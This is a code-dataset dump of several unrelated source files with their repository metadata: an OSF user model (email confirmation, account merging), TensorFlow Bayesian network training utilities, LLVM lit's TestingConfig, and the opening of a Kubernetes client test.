issues.append('Old password is invalid')
elif raw_old_password == raw_new_password:
issues.append('Password cannot be the same')
elif raw_new_password == self.username:
issues.append('Password cannot be the same as your email address')
if not raw_old_password or not raw_new_password or not raw_confirm_password:
issues.append('Passwords cannot be blank')
elif len(raw_new_password) < 6:
issues.append('Password should be at least six characters')
elif len(raw_new_password) > 256:
issues.append('Password should not be longer than 256 characters')
if raw_new_password != raw_confirm_password:
issues.append('Password does not match the confirmation')
if issues:
raise ChangePasswordError(issues)
self.set_password(raw_new_password)
def _set_email_token_expiration(self, token, expiration=None):
"""Set the expiration date for given email token.
:param str token: The email token to set the expiration for.
:param datetime expiration: Datetime at which to expire the token. If ``None``, the
token will expire after ``settings.EMAIL_TOKEN_EXPIRATION`` hours. This is only
used for testing purposes.
"""
expiration = expiration or (dt.datetime.utcnow() + dt.timedelta(hours=settings.EMAIL_TOKEN_EXPIRATION))
self.email_verifications[token]['expiration'] = expiration
return expiration
def add_unconfirmed_email(self, email, expiration=None):
"""Add an email verification token for a given email."""
# TODO: This is technically not compliant with RFC 822, which requires
# that case be preserved in the "local-part" of an address. From
# a practical standpoint, the vast majority of email servers do
# not preserve case.
# ref: https://tools.ietf.org/html/rfc822#section-6
email = email.lower().strip()
if email in self.emails:
raise ValueError('Email already confirmed to this user.')
utils.validate_email(email)
# If the unconfirmed email is already present, refresh the token
if email in self.unconfirmed_emails:
self.remove_unconfirmed_email(email)
token = generate_confirm_token()
# handle when email_verifications is None
if not self.email_verifications:
self.email_verifications = {}
# confirmed used to check if link has been clicked
self.email_verifications[token] = {'email': email,
'confirmed': False}
self._set_email_token_expiration(token, expiration=expiration)
return token
def remove_unconfirmed_email(self, email):
"""Remove an unconfirmed email addresses and their tokens."""
for token, value in self.email_verifications.iteritems():
if value.get('email') == email:
del self.email_verifications[token]
return True
return False
def remove_email(self, email):
"""Remove a confirmed email"""
if email == self.username:
raise PermissionsError("Can't remove primary email")
if email in self.emails:
self.emails.remove(email)
signals.user_email_removed.send(self, email=email)
@signals.user_email_removed.connect
def _send_email_removal_confirmations(self, email):
mails.send_mail(to_addr=self.username,
mail=mails.REMOVED_EMAIL,
user=self,
removed_email=email,
security_addr='alternate email address ({})'.format(email))
mails.send_mail(to_addr=email,
mail=mails.REMOVED_EMAIL,
user=self,
removed_email=email,
security_addr='primary email address ({})'.format(self.username))
def get_confirmation_token(self, email, force=False):
"""Return the confirmation token for a given email.
:param str email: Email to get the token for.
:param bool force: If an expired token exists for the given email, generate a new
token and return that token.
:raises: ExpiredTokenError if trying to access a token that is expired and force=False.
:raises: KeyError if there no token for the email.
"""
# TODO: Refactor "force" flag into User.get_or_add_confirmation_token
for token, info in self.email_verifications.items():
if info['email'].lower() == email.lower():
# Old records will not have an expiration key. If it's missing,
# assume the token is expired
expiration = info.get('expiration')
if not expiration or (expiration and expiration < dt.datetime.utcnow()):
if not force:
raise ExpiredTokenError('Token for email "{0}" is expired'.format(email))
else:
new_token = self.add_unconfirmed_email(email)
self.save()
return new_token
return token
raise KeyError('No confirmation token for email "{0}"'.format(email))
def get_confirmation_url(self, email, external=True, force=False):
"""Return the confirmation url for a given email.
:raises: ExpiredTokenError if trying to access a token that is expired.
:raises: KeyError if there is no token for the email.
"""
base = settings.DOMAIN if external else '/'
token = self.get_confirmation_token(email, force=force)
return '{0}confirm/{1}/{2}/'.format(base, self._primary_key, token)
def get_unconfirmed_email_for_token(self, token):
"""Return email if valid.
:rtype: bool
:raises: ExpiredTokenError if trying to access a token that is expired.
:raises: InvalidTokenError if trying to access a token that is invalid.
"""
if token not in self.email_verifications:
raise InvalidTokenError
verification = self.email_verifications[token]
# Not all tokens are guaranteed to have expiration dates
if (
'expiration' in verification and
verification['expiration'] < dt.datetime.utcnow()
):
raise ExpiredTokenError
return verification['email']
def clean_email_verifications(self, given_token=None):
email_verifications = deepcopy(self.email_verifications or {})
for token in self.email_verifications or {}:
try:
self.get_unconfirmed_email_for_token(token)
except (KeyError, ExpiredTokenError):
email_verifications.pop(token)
continue
if token == given_token:
email_verifications.pop(token)
self.email_verifications = email_verifications
def verify_claim_token(self, token, project_id):
"""Return whether or not a claim token is valid for this user for
a given node which they were added as a unregistered contributor for.
"""
try:
record = self.get_unclaimed_record(project_id)
except ValueError: # No unclaimed record for given pid
return False
return record['token'] == token
def confirm_email(self, token, merge=False):
"""Confirm the email address associated with the token"""
email = self.get_unconfirmed_email_for_token(token)
# If this email is confirmed on another account, abort
try:
user_to_merge = User.find_one(Q('emails', 'iexact', email))
except NoResultsFound:
user_to_merge = None
if user_to_merge and merge:
self.merge_user(user_to_merge)
elif user_to_merge:
raise MergeConfirmedRequiredError(
'Merge requires confirmation',
user=self,
user_to_merge=user_to_merge,
)
# If another user has this email as its username, get it
try:
unregistered_user = User.find_one(Q('username', 'eq', email) &
Q('_id', 'ne', self._id))
except NoResultsFound:
unregistered_user = None
if unregistered_user:
self.merge_user(unregistered_user)
self.save()
unregistered_user.username = None
if email not in self.emails:
self.emails.append(email)
# Complete registration if primary email
if email.lower() == self.username.lower():
self.register(self.username)
self.date_confirmed = dt.datetime.utcnow()
# Revoke token
del self.email_verifications[token]
# TODO: We can't assume that all unclaimed records are now claimed.
# Clear unclaimed records, so user's name shows up correctly on
# all projects
self.unclaimed_records = {}
self.save()
self.update_search_nodes()
return True
@property
def unconfirmed_emails(self):
# Handle when email_verifications field is None
email_verifications = self.email_verifications or {}
return [
each['email']
for each
in email_verifications.values()
]
def update_search_nodes(self):
"""Call `update_search` on all nodes on which the user is a
contributor. Needed to add self to contributor lists in search upon
registration or claiming.
"""
for node in self.contributed:
node.update_search()
def update_search_nodes_contributors(self):
"""
Bulk update contributor name on all nodes on which the user is
a contributor.
:return:
"""
from website.search import search
search.update_contributors(self.visible_contributor_to)
def update_affiliated_institutions_by_email_domain(self):
"""
Append affiliated_institutions by email domain.
:return:
"""
# Avoid circular import
from website.project.model import Institution
try:
email_domains = [email.split('@')[1] for email in self.emails]
insts = Institution.find(Q('email_domains', 'in', email_domains))
for inst in insts:
if inst not in self.affiliated_institutions:
self.affiliated_institutions.append(inst)
except (IndexError, NoResultsFound):
pass
@property
def is_confirmed(self):
return bool(self.date_confirmed)
@property
def social_links(self):
social_user_fields = {}
for key, val in self.social.items():
if val and key in self.SOCIAL_FIELDS:
if not isinstance(val, basestring):
social_user_fields[key] = val
else:
social_user_fields[key] = self.SOCIAL_FIELDS[key].format(val)
return social_user_fields
@property
def biblio_name(self):
given_names = self.given_name + ' ' + self.middle_names
surname = self.family_name
if surname != given_names:
initials = [
name[0].upper() + '.'
for name in given_names.split(' ')
if name and re.search(r'\w', name[0], re.I)
]
return u'{0}, {1}'.format(surname, ' '.join(initials))
return surname
@property
def given_name_initial(self):
"""
The user's preferred initialization of their given name.
Some users with common names may choose to distinguish themselves from
their colleagues in this way. For instance, there could be two
well-known researchers in a single field named "Robert Walker".
"Walker, R" could then refer to either of them. "Walker, R.H." could
provide easy disambiguation.
NOTE: The internal representation for this should never end with a
period. "R" and "R.H" would be correct in the prior case, but
"R.H." would not.
"""
return self.given_name[0]
@property
def url(self):
return '/{}/'.format(self._primary_key)
@property
def api_url(self):
return '/api/v1/profile/{0}/'.format(self._primary_key)
@property
def absolute_url(self):
return urlparse.urljoin(settings.DOMAIN, self.url)
@property
def display_absolute_url(self):
url = self.absolute_url
if url is not None:
return re.sub(r'https?:', '', url).strip('/')
@property
def deep_url(self):
return '/profile/{}/'.format(self._primary_key)
@property
def unconfirmed_email_info(self):
"""Return a list of dictionaries containing information about each of this
user's unconfirmed emails.
"""
unconfirmed_emails = []
email_verifications = self.email_verifications or []
for token in email_verifications:
if self.email_verifications[token].get('confirmed', False):
try:
user_merge = User.find_one(Q('emails', 'eq', self.email_verifications[token]['email'].lower()))
except NoResultsFound:
user_merge = False
unconfirmed_emails.append({'address': self.email_verifications[token]['email'],
'token': token,
'confirmed': self.email_verifications[token]['confirmed'],
'user_merge': user_merge.email if user_merge else False})
return unconfirmed_emails
def profile_image_url(self, size=None):
"""A generalized method for getting a user's profile picture urls.
We may choose to use some service other than gravatar in the future,
and should not commit ourselves to using a specific service (mostly
an API concern).
As long as we use gravatar, this is just a proxy to User.gravatar_url
"""
return self._gravatar_url(size)
def _gravatar_url(self, size):
return filters.gravatar(
self,
use_ssl=True,
size=size
)
def get_activity_points(self, db=None):
db = db or framework.mongo.database
return analytics.get_total_activity_count(self._primary_key, db=db)
def disable_account(self):
"""
Disables user account, making is_disabled true, while also unsubscribing user
from mailchimp emails.
"""
from website import mailchimp_utils
try:
mailchimp_utils.unsubscribe_mailchimp(
list_name=settings.MAILCHIMP_GENERAL_LIST,
user_id=self._id,
username=self.username
)
except mailchimp_utils.mailchimp.ListNotSubscribedError:
pass
except mailchimp_utils.mailchimp.InvalidApiKeyError:
if not settings.ENABLE_EMAIL_SUBSCRIPTIONS:
pass
else:
raise
self.is_disabled = True
@property
def is_disabled(self):
"""Whether or not this account has been disabled.
Abstracts ``User.date_disabled``.
:return: bool
"""
return self.date_disabled is not None
@is_disabled.setter
def is_disabled(self, val):
"""Set whether or not this account has been disabled."""
if val and not self.date_disabled:
self.date_disabled = dt.datetime.utcnow()
elif val is False:
self.date_disabled = None
@property
def is_merged(self):
'''Whether or not this account has been merged into another account.
'''
return self.merged_by is not None
@property
def profile_url(self):
return '/{}/'.format(self._id)
@property
def contributed(self):
from website.project.model import Node
return Node.find(Q('contributors', 'eq', self._id))
@property
def contributor_to(self):
from website.project.model import Node
return Node.find(
Q('contributors', 'eq', self._id) &
Q('is_deleted', 'ne', True) &
Q('is_collection', 'ne', True)
)
@property
def visible_contributor_to(self):
from website.project.model import Node
return Node.find(
Q('contributors', 'eq', self._id) &
Q('is_deleted', 'ne', True) &
Q('is_collection', 'ne', True) &
Q('visible_contributor_ids', 'eq', self._id)
)
def get_summary(self, formatter='long'):
return {
'user_fullname': self.fullname,
'user_profile_url': self.profile_url,
'user_display_name': name_formatters[formatter](self),
'user_is_claimed': self.is_claimed
}
def save(self, *args, **kwargs):
# TODO: Update mailchimp subscription on username change
# Avoid circular import
from framework.analytics import tasks as piwik_tasks
self.username = self.username.lower().strip() if self.username else None
ret = super(User, self).save(*args, **kwargs)
if self.SEARCH_UPDATE_FIELDS.intersection(ret) and self.is_confirmed:
self.update_search()
self.update_search_nodes_contributors()
if settings.PIWIK_HOST and not self.piwik_token:
piwik_tasks.update_user(self._id)
return ret
def update_search(self):
from website import search
try:
search.search.update_user(self)
except search.exceptions.SearchUnavailableError as e:
logger.exception(e)
log_exception()
@classmethod
def find_by_email(cls, email):
try:
user = cls.find_one(
Q('emails', 'eq', email)
)
return [user]
except:
return []
def serialize(self, anonymous=False):
return {
'id': utils.privacy_info_handle(self._primary_key, anonymous),
'fullname': utils.privacy_info_handle(self.fullname, anonymous, name=True),
'registered': self.is_registered,
'url': utils.privacy_info_handle(self.url, anonymous),
'api_url': utils.privacy_info_handle(self.api_url, anonymous),
}
###### OSF-Specific methods ######
def watch(self, watch_config):
"""Watch a node by adding its WatchConfig to this user's ``watched``
list. Raises ``ValueError`` if the node is already watched.
:param watch_config: The WatchConfig to add.
:param save: Whether to save the user.
"""
watched_nodes = [each.node for each in self.watched]
if watch_config.node in watched_nodes:
raise ValueError('Node is already being watched.')
watch_config.save()
self.watched.append(watch_config)
return None
def unwatch(self, watch_config):
"""Unwatch a node by removing its WatchConfig from this user's ``watched``
list. Raises ``ValueError`` if the node is not already being watched.
:param watch_config: The WatchConfig to remove.
:param save: Whether to save the user.
"""
for each in self.watched:
if watch_config.node._id == each.node._id:
from framework.transactions.context import TokuTransaction # Avoid circular import
with TokuTransaction():
# Ensure that both sides of the relationship are removed
each.__class__.remove_one(each)
self.watched.remove(each)
self.save()
return None
raise ValueError('Node not being watched.')
def is_watching(self, node):
'''Return whether a not a user is watching a Node.'''
watched_node_ids = set([config.node._id for config in self.watched])
return node._id in watched_node_ids
def get_recent_log_ids(self, since=None):
'''Return a generator of recent logs' ids.
:param since: A datetime specifying the oldest time to retrieve logs
from. If ``None``, defaults to 60 days before today. Must be a tz-aware
datetime because PyMongo's generation times are tz-aware.
:rtype: generator of log ids (strings)
'''
log_ids = []
# Default since to 60 days before today if since is None
# timezone aware utcnow
utcnow = dt.datetime.utcnow().replace(tzinfo=pytz.utc)
since_date = since or (utcnow - dt.timedelta(days=60))
for config in self.watched:
# Extract the timestamps for each log from the log_id (fast!)
# The first 4 bytes of Mongo's ObjectId encodes time
# This prevents having to load each Log Object and access their
# date fields
node_log_ids = [log.pk for log in config.node.logs
if bson.ObjectId(log.pk).generation_time > since_date and
log.pk not in log_ids]
# Log ids in reverse chronological order
log_ids = _merge_into_reversed(log_ids, node_log_ids)
return (l_id for l_id in log_ids)
def get_daily_digest_log_ids(self):
'''Return a generator of log ids generated in the past day
(starting at UTC 00:00).
'''
utcnow = dt.datetime.utcnow()
midnight = dt.datetime(
utcnow.year, utcnow.month, utcnow.day,
0, 0, 0, tzinfo=pytz.utc
)
return self.get_recent_log_ids(since=midnight)
@property
def can_be_merged(self):
"""The ability of the `merge_user` method to fully merge the user"""
return all((addon.can_be_merged for addon in self.get_addons()))
def merge_user(self, user):
"""Merge a registered user into this account. This user will be
a contributor on any project. if the registered user and this account
are both contributors of the same project. Then it will remove the
registered user and set this account to the highest permission of the two
and set this account to be visible if either of the two are visible on
the project.
:param user: A User object to be merged.
"""
# Fail if the other user has conflicts.
if not user.can_be_merged:
raise MergeConflictError('Users cannot be merged')
# Move over the other user's attributes
# TODO: confirm
for system_tag in user.system_tags:
if system_tag not in self.system_tags:
self.system_tags.append(system_tag)
self.is_claimed = self.is_claimed or user.is_claimed
self.is_invited = self.is_invited or user.is_invited
# copy over profile only if this user has no profile info
if user.jobs and not self.jobs:
self.jobs = user.jobs
if user.schools and not self.schools:
self.schools = user.schools
if user.social and not self.social:
self.social = user.social
unclaimed = user.unclaimed_records.copy()
unclaimed.update(self.unclaimed_records)
self.unclaimed_records = unclaimed
# - unclaimed records should be connected to only one user
user.unclaimed_records = {}
security_messages = user.security_messages.copy()
security_messages.update(self.security_messages)
self.security_messages = security_messages
notifications_configured = user.notifications_configured.copy()
notifications_configured.update(self.notifications_configured)
self.notifications_configured = notifications_configured
for key, value in user.mailchimp_mailing_lists.iteritems():
# subscribe to each list if either user was subscribed
subscription = value or self.mailchimp_mailing_lists.get(key)
signals.user_merged.send(self, list_name=key, subscription=subscription)
# clear subscriptions for merged user
signals.user_merged.send(user, list_name=key, subscription=False, send_goodbye=False)
for target_id, timestamp in user.comments_viewed_timestamp.iteritems():
if not self.comments_viewed_timestamp.get(target_id):
self.comments_viewed_timestamp[target_id] = timestamp
elif timestamp > self.comments_viewed_timestamp[target_id]:
self.comments_viewed_timestamp[target_id] = timestamp
self.emails.extend(user.emails)
user.emails = []
for k, v in user.email_verifications.iteritems():
email_to_confirm = v['email']
if k not in self.email_verifications and email_to_confirm != user.username:
self.email_verifications[k] = v
user.email_verifications = {}
for institution in user.affiliated_institutions:
self.affiliated_institutions.append(institution)
user._affiliated_institutions = []
# FOREIGN FIELDS
for watched in user.watched:
if watched not in self.watched:
self.watched.append(watched)
user.watched = []
for account in user.external_accounts:
if account not in self.external_accounts:
self.external_accounts.append(account)
user.external_accounts = []
# - addons
# Note: This must occur before the merged user is removed as a
# contributor on the nodes, as an event hook is otherwise fired
# which removes the credentials.
for addon in user.get_addons():
user_settings = self.get_or_add_addon(addon.config.short_name)
user_settings.merge(addon)
user_settings.save()
# Disconnect signal to prevent emails being sent about being a new contributor when merging users
# be sure to reconnect it at the end of this code block. Import done here to prevent circular import error.
from website.addons.osfstorage.listeners import checkin_files_by_user
from website.project.signals import contributor_added, contributor_removed
from website.project.views.contributor import notify_added_contributor
from website.util import disconnected_from
# - projects where the user was a contributor
with disconnected_from(signal=contributor_added, listener=notify_added_contributor):
for node in user.contributed:
# Skip bookmark collection node
if node.is_bookmark_collection:
continue
# if both accounts are contributor of the same project
if node.is_contributor(self) and node.is_contributor(user):
if node.permissions[user._id] > node.permissions[self._id]:
permissions = node.permissions[user._id]
else:
permissions = node.permissions[self._id]
node.set_permissions(user=self, permissions=permissions)
visible1 = self._id in node.visible_contributor_ids
visible2 = user._id in node.visible_contributor_ids
if visible1 != visible2:
node.set_visible(user=self, visible=True, log=True, auth=Auth(user=self))
else:
node.add_contributor(
contributor=self,
permissions=node.get_permissions(user),
visible=node.get_visible(user),
log=False,
)
with disconnected_from(signal=contributor_removed, listener=checkin_files_by_user):
try:
node.remove_contributor(
contributor=user,
auth=Auth(user=self),
log=False,
)
except ValueError:
logger.error('Contributor {0} not in list on node {1}'.format(
user._id, node._id
))
node.save()
# - projects where the user was the creator
for node in user.created:
node.creator = self
node.save()
# - file that the user has checked_out, import done here to prevent import error
from website.files.models.base import FileNode
for file_node in FileNode.files_checked_out(user=user):
file_node.checkout = self
file_node.save()
# finalize the merge
remove_sessions_for_user(user)
# - username is set to None so the resultant user can set it primary
# in the future.
user.username = None
user.password = None
user.verification_key = None
user.osf_mailing_lists = {}
user.merged_by = self
user.save()
def get_projects_in_common(self, other_user, primary_keys=True):
"""Returns either a collection of "shared projects" (projects that both users are contributors for)
or just their primary keys
"""
if primary_keys:
projects_contributed_to = set(self.contributed.get_keys())
other_projects_primary_keys = set(other_user.contributed.get_keys())
return projects_contributed_to.intersection(other_projects_primary_keys)
else:
projects_contributed_to = set(self.contributed)
return projects_contributed_to.intersection(other_user.contributed)
def n_projects_in_common(self, other_user):
"""Returns number of "shared projects" (projects that both users are contributors for)"""
return len(self.get_projects_in_common(other_user, primary_keys=True))
def is_affiliated_with_institution(self, inst):
return inst in self.affiliated_institutions
def remove_institution(self, inst_id):
removed = False
for inst in self.affiliated_institutions:
if inst._id == inst_id:
self.affiliated_institutions.remove(inst)
removed = True
return removed
_affiliated_institutions = fields.ForeignField('node', list=True)
@property
def affiliated_institutions(self):
from website.institutions.model import Institution, AffiliatedInstitutionsList
return AffiliatedInstitutionsList([Institution(inst) for inst in self._affiliated_institutions], obj=self, private_target='_affiliated_institutions')
def get_node_comment_timestamps(self, target_id):
""" Returns the timestamp for when comments were last viewed on a node, file or wiki.
"""
default_timestamp = dt.datetime(1970, 1, 1, 12, 0, 0)
return self.comments_viewed_timestamp.get(target_id, default_timestamp)
def _merge_into_reversed(*iterables):
'''Merge multiple sorted inputs into a single output in reverse order.
'''
return sorted(itertools.chain(*iterables), reverse=True)
| 36.849406
| 157
| 0.625811
|
7d6381e1bf3e8720f96182907732dc40465fb5d9
| 7,072
|
py
|
Python
|
CBLN/bnn/train_utils.py
|
Honglin20/Thesis
|
ec344f82d8200ce006082ad32d75a905314be77e
|
[
"MIT"
] | null | null | null |
CBLN/bnn/train_utils.py
|
Honglin20/Thesis
|
ec344f82d8200ce006082ad32d75a905314be77e
|
[
"MIT"
] | null | null | null |
CBLN/bnn/train_utils.py
|
Honglin20/Thesis
|
ec344f82d8200ce006082ad32d75a905314be77e
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
def reduce_entropy(X, axis=-1):
"""
calculate the entropy over axis and reduce that axis
:param X:
:param axis:
:return:
"""
return -1 * np.sum(X * np.log(X+1E-12), axis=axis)
def calc_risk(preds, labels=None):
"""
Calculates the parameters we can possibly use to examine risk of a neural net
:param preds: preds in shape [num_runs, num_batch, num_classes]
:param labels:
:return:
"""
#if isinstance(preds, list):
# preds = np.stack(preds)
# preds in shape [num_runs, num_batch, num_classes]
num_runs, num_batch = preds.shape[:2]
ave_preds = np.mean(preds, axis=0)
pred_class = np.argmax(ave_preds, axis=1)
# entropy of the posterior predictive
entropy = reduce_entropy(ave_preds, axis=1)
# Expected entropy of the predictive under the parameter posterior
entropy_exp = np.mean(reduce_entropy(preds, axis=2), axis=0)
mutual_info = entropy - entropy_exp # Equation 2 of https://arxiv.org/pdf/1711.08244.pdf
# Average and variance of softmax for the predicted class
variance = np.std(preds[:, range(num_batch), pred_class], 0)
ave_softmax = np.mean(preds[:, range(num_batch), pred_class], 0)
# And calculate accuracy if we know the labels
if labels is not None:
correct = np.equal(pred_class, labels)
else:
correct = None
predictive_score = ave_preds[np.arange(num_batch),pred_class]
return [entropy, mutual_info, variance, ave_softmax, correct,predictive_score]
def em_predict(predictions,y):
avg_pred = np.mean(predictions,axis=0)
risk = calc_risk(predictions)
acc = np.mean(np.equal(np.argmax(y,1), np.argmax(avg_pred, axis=-1)))
return acc,risk,risk[-1]
def eval(net,sess,num_task,writer,test_init,test_accs,params_idx=None,disp=True,record=True):
avg_acc_all = 0.0
current_acc = 0.0
for test_idx in range(num_task):
sess.run(test_init[test_idx])
if params_idx is not None:
#improving
net.set_task_params(sess,params_idx[test_idx])
avg_acc = 0.0
#for _ in range(1000):
num_test = 0
while True:
try:
if writer is not None:
acc,summaries,step = sess.run([net.accuracy,net.summary_op,net.gstep])#,feed_dict={x:batch[0],y_:batch[1]})
else:
acc,step = sess.run([net.accuracy,net.gstep])
num_test += 1
avg_acc += acc
except tf.errors.OutOfRangeError:
break
if writer is not None:
writer.add_summary(summaries,global_step = step)
if record:
test_accs[test_idx].append(avg_acc / num_test)
avg_acc_all += avg_acc / num_test
if record:
test_accs['avg'].append(avg_acc_all / num_task)
return avg_acc_all / num_task
def em_eval(net,sess,num_task,writer,testsets,test_accs,disp=True,record=True,num_runs=200,search_best=True):
def make_prediction(data,label):
predictions = []
total_acc = 0.0
for _ in range(num_runs):
pred, em_acc = sess.run([net.predictions,net.em_accuracy],feed_dict={net.x_placeholder:data,net.y_placeholder:label})
predictions.append(pred)
total_acc += em_acc
return np.array(predictions),total_acc/num_runs
avg_acc_all = 0.0
params_idx_list = []
total_iter = num_task * len(net.params_mean.keys())
iter_step = 0
correct = True
for test_idx in range(num_task):
avg_acc = []
avg_uncertainty = []
for params_idx in net.params_mean.keys():
print('Getting Idex {}/{} ...'.format(iter_step,total_iter),end='\r')
iter_step += 1
net.set_task_params(sess,params_idx)
avg_acc.append(0.0)
avg_uncertainty.append(0.0)
for iters in range(1):
pred_idx = np.random.choice(np.arange(testsets[test_idx][0].shape[0]),200)
test_data = testsets[test_idx][0][pred_idx]
test_label = testsets[test_idx][1][pred_idx]
#while True:
try:
predictions,acc = make_prediction(test_data,test_label)
step = sess.run(net.gstep)
acc,uncertainty,scores = em_predict(predictions,test_label)
except tf.errors.OutOfRangeError:
pass
avg_uncertainty[params_idx] += uncertainty[2]
info = 'Task {} : {} th set of parameters has minimal uncertainty : Correct !'.format(test_idx,np.argmin(np.mean(avg_uncertainty,axis=1)))
params_idx_list.append(np.argmin(np.mean(avg_uncertainty,axis=1)))
min_idx = np.argmin(np.mean(avg_uncertainty,axis=1))
if search_best and min_idx != test_idx and num_task<10:
correct = False
info = 'Task {} : {} th set of parameters has minimal uncertainty : Wrong !'.format(test_idx,np.argmin(np.mean(avg_uncertainty,axis=1)))
print(info)
print('The model cannot identify the test data correctly ...')
print('Search for a new model, {} th running start ...'.format(net.num_runs+1))
net.num_runs += 1
break
print(info)
return params_idx_list,correct
def em_train(model,sess,num_epoch,trainset,testsets,train_init,test_init,lams=[0.01],search_best=True):
model.initialize_default_params(sess)
dp = False
test_accs = {}
test_accs['avg'] = []
for t in range(len(testsets)):
test_accs[t] = []
print('Training start ...')
#writer = tf.summary.FileWriter(graph_path,tf.get_default_graph())
writer = None
num_task = len(trainset)
sess.run(model.lams.assign(lams[0]))
for idx in range(num_task):
model.reset(sess)
print('Training {} th Task ...'.format(idx+1))
# Training Start
for e in range(num_epoch):
sess.run(train_init[idx])
try:
while True:
_,step = sess.run([model.train_op,model.gstep])
except tf.errors.OutOfRangeError:
pass
model.store_params(idx)
print('Merging Process Start ... ')
model.st_smooth(n_component=num_task,dp=dp,thresh_hold=0.5/num_task)
print('Evaluating the Uncertainty ... ')
param_idx,correct = em_eval(model,sess,num_task,None,testsets,test_accs,record=False,disp=False,search_best=search_best)
if correct:
acc = eval(model,sess,num_task,None,test_init,test_accs,params_idx=param_idx,record=True,disp=False)
print('Find the best model after searching {} times, Final Average Accuracy for all the Tasks : {}'.format(model.num_runs,acc))
else:
em_train(model,sess,num_epoch,trainset,testsets,train_init,test_init,lams=[0],search_best=search_best)
| 35.898477
| 147
| 0.617647
|
4a34b77e175b9584e6ce1eedc8c23f0bcbe4a9e7
| 5,640
|
py
|
Python
|
llvm/3.4.2/llvm-3.4.2.src/utils/lit/lit/TestingConfig.py
|
tangyibin/goblin-core
|
1940db6e95908c81687b2b22ddd9afbc8db9cdfe
|
[
"BSD-3-Clause"
] | 36
|
2015-01-13T19:34:04.000Z
|
2022-03-07T22:22:15.000Z
|
llvm/3.4.2/llvm-3.4.2.src/utils/lit/lit/TestingConfig.py
|
tangyibin/goblin-core
|
1940db6e95908c81687b2b22ddd9afbc8db9cdfe
|
[
"BSD-3-Clause"
] | 7
|
2015-10-20T19:05:01.000Z
|
2021-11-13T14:55:47.000Z
|
llvm/3.4.2/llvm-3.4.2.src/utils/lit/lit/TestingConfig.py
|
tangyibin/goblin-core
|
1940db6e95908c81687b2b22ddd9afbc8db9cdfe
|
[
"BSD-3-Clause"
] | 18
|
2015-04-23T20:59:52.000Z
|
2021-11-18T20:06:39.000Z
|
import os
import sys
PY2 = sys.version_info[0] < 3
class TestingConfig:
""""
TestingConfig - Information on the tests inside a suite.
"""
@staticmethod
def fromdefaults(litConfig):
"""
fromdefaults(litConfig) -> TestingConfig
Create a TestingConfig object with default values.
"""
# Set the environment based on the command line arguments.
environment = {
'LIBRARY_PATH' : os.environ.get('LIBRARY_PATH',''),
'LD_LIBRARY_PATH' : os.environ.get('LD_LIBRARY_PATH',''),
'PATH' : os.pathsep.join(litConfig.path +
[os.environ.get('PATH','')]),
'SYSTEMROOT' : os.environ.get('SYSTEMROOT',''),
'TERM' : os.environ.get('TERM',''),
'LLVM_DISABLE_CRASH_REPORT' : '1',
}
if sys.platform == 'win32':
environment.update({
'INCLUDE' : os.environ.get('INCLUDE',''),
'PATHEXT' : os.environ.get('PATHEXT',''),
'PYTHONUNBUFFERED' : '1',
'TEMP' : os.environ.get('TEMP',''),
'TMP' : os.environ.get('TMP',''),
})
# The option to preserve TEMP, TMP, and TMPDIR.
# This is intended to check how many temporary files would be generated
# (and be not cleaned up) in automated builders.
if os.environ.has_key('LIT_PRESERVES_TMP'):
environment.update({
'TEMP' : os.environ.get('TEMP',''),
'TMP' : os.environ.get('TMP',''),
'TMPDIR' : os.environ.get('TMPDIR',''),
})
# Set the default available features based on the LitConfig.
available_features = []
if litConfig.useValgrind:
available_features.append('valgrind')
if litConfig.valgrindLeakCheck:
available_features.append('vg_leak')
return TestingConfig(None,
name = '<unnamed>',
suffixes = set(),
test_format = None,
environment = environment,
substitutions = [],
unsupported = False,
test_exec_root = None,
test_source_root = None,
excludes = [],
available_features = available_features,
pipefail = True)
def load_from_path(self, path, litConfig):
"""
load_from_path(path, litConfig)
Load the configuration module at the provided path into the given config
object.
"""
# Load the config script data.
f = open(path)
try:
data = f.read()
except:
litConfig.fatal('unable to load config file: %r' % (path,))
f.close()
# Execute the config script to initialize the object.
cfg_globals = dict(globals())
cfg_globals['config'] = self
cfg_globals['lit_config'] = litConfig
cfg_globals['__file__'] = path
try:
if PY2:
exec("exec data in cfg_globals")
else:
exec(data, cfg_globals)
if litConfig.debug:
litConfig.note('... loaded config %r' % path)
except SystemExit:
e = sys.exc_info()[1]
# We allow normal system exit inside a config file to just
# return control without error.
if e.args:
raise
except:
import traceback
litConfig.fatal(
'unable to parse config file %r, traceback: %s' % (
path, traceback.format_exc()))
self.finish(litConfig)
def __init__(self, parent, name, suffixes, test_format,
environment, substitutions, unsupported,
test_exec_root, test_source_root, excludes,
available_features, pipefail):
self.parent = parent
self.name = str(name)
self.suffixes = set(suffixes)
self.test_format = test_format
self.environment = dict(environment)
self.substitutions = list(substitutions)
self.unsupported = unsupported
self.test_exec_root = test_exec_root
self.test_source_root = test_source_root
self.excludes = set(excludes)
self.available_features = set(available_features)
self.pipefail = pipefail
def finish(self, litConfig):
"""finish() - Finish this config object, after loading is complete."""
self.name = str(self.name)
self.suffixes = set(self.suffixes)
self.environment = dict(self.environment)
self.substitutions = list(self.substitutions)
if self.test_exec_root is not None:
# FIXME: This should really only be suite in test suite config
# files. Should we distinguish them?
self.test_exec_root = str(self.test_exec_root)
if self.test_source_root is not None:
# FIXME: This should really only be suite in test suite config
# files. Should we distinguish them?
self.test_source_root = str(self.test_source_root)
self.excludes = set(self.excludes)
@property
def root(self):
"""root attribute - The root configuration for the test suite."""
if self.parent is None:
return self
else:
return self.parent.root
| 37.105263
| 80
| 0.537589
|
ddfdb7b32bc3448dc2d1c16ba1090aec87e79449
| 1,002
|
py
|
Python
|
kubernetes/test/test_v1beta2_deployment_spec.py
|
iamneha/python
|
5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0
|
[
"Apache-2.0"
] | 1
|
2019-02-17T15:28:39.000Z
|
2019-02-17T15:28:39.000Z
|
kubernetes/test/test_v1beta2_deployment_spec.py
|
iamneha/python
|
5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/test/test_v1beta2_deployment_spec.py
|
iamneha/python
|
5b208a1a49a8d6f8bbab28bcc226b9ef793bcbd0
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1beta2_deployment_spec import V1beta2DeploymentSpec
